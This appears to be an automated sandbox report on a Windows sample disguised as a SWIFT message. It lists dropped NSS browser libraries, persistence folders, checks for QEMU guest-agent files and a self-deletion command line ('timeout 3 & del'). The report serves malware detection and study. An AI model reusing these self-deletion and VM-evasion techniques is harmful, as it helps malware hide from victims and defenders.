Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation

barindex
Source: Yara match File source: 00000001.00000002.7934819719.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.7688018397.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFA23D push esp; ret 1_2_02AFA248
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF4065 push ds; retf 1_2_02AF4067
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFA172 push edx; retf 1_2_02AFA1AE
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr Static PE information: 0xE0D5091C [Wed Jul 13 01:51:24 2089 UTC]
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210 Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210\Cykelhandlerne.Sme Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\libxml2-2.0.typelib Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Coasting102.For Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate\memstat.c Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes\selection-end-symbolic.symbolic.png Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
